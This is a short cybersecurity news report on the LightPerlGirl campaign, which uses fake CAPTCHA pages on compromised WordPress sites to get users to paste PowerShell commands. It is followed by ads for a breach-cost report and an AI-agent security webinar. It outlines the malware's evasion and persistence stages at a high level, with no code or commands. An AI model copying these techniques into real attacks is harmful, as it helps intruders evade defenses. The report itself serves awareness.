Cybersecurity experts have flagged a deceptive malware campaign that uses fake CAPTCHA pop-up windows to install a new threat dubbed LightPerlGirl. The attack tricks users into manually executing disguised PowerShell commands, making it harder for security tools to detect the intrusion.
Researchers at Todyl identified the threat after spotting unusual PowerShell activity on a partner’s compromised device. The campaign hijacks legitimate but previously breached WordPress sites to deliver a fake security check, mimicking trusted services like Cloudflare.
Instead of exploiting software vulnerabilities, the attackers rely on social engineering, prompting users to copy and run a command via the Windows Run dialog. This manual step helps the malware bypass traditional security barriers.
LightPerlGirl, named after a signature in its code (“Copyright (c) LightPerlGirl 2025”) and embedded Russian strings, operates in multiple stealthy stages. The initial script contacts a command-and-control server to fetch a secondary payload, which includes three core functions:
- HelpIO: Attempts privilege escalation and disables antivirus detection by excluding the Temp folder from Windows Defender scans.
- Urex: Ensures persistence by downloading a batch file and adding a startup shortcut.
- ExWpL: Executes a fileless payload using .NET reflection—an advanced evasion method that avoids creating detectable files on disk.
This technique-heavy campaign shows how modern threats combine trusted interface mimicry with technical sophistication. The malware’s persistence mechanism ensures it stays active across reboots, maintaining covert access via its C2 infrastructure.
The attack underlines a broader shift in cyber threats—away from traditional exploits and toward manipulation of users through familiar interfaces, making them unwitting participants in compromising their systems.
Cybersecurity teams are urged to bolster endpoint protections and raise awareness around deceptive pop-ups, as attackers refine their methods to slip past even the most modern defense tools.
Stay ahead of emerging cybersecurity threats. For the latest insights and updates on cloud security, follow SOC News.
News Source: CybersecurityNews.com
How much could a data breach cost your business? The Cost of a Data Breach Report offers a detailed investigation of factors that influence financial impacts to organizations. Discover what security measures can mitigate costs based on analysis of over 500 real security incidents
- Understand cost mitigation effects of security automation and incident response planning
- Gain insight into factors that can amplify the cost of a breach including security system complexity
- Benchmark costs based on industry region and organization size
Download Now
Organizations are rapidly building AI applications, and cybercriminals are eager to exploit them. These apps introduce a new stack with models, plugins, inference, and training datasets accessing sensitive data. To accelerate innovation, organizations are embracing no-code and low-code platforms. The proliferation of AI agents is transforming operations, enhancing customer engagement, and driving growth.
These agents surpass traditional chatbots by making decisions and acting as proactive partners. However, this rapid adoption introduces unique security risks. Vulnerabilities can arise from insufficient safeguards, misconfigurations, or lack of cybersecurity expertise. Threat actors target these ecosystems, exploiting gaps in memory and decision-making processes.
Join us to explore securing your AI ecosystem, including agents built using no-code and low-code platforms, and learn strategies to safeguard AI agents.
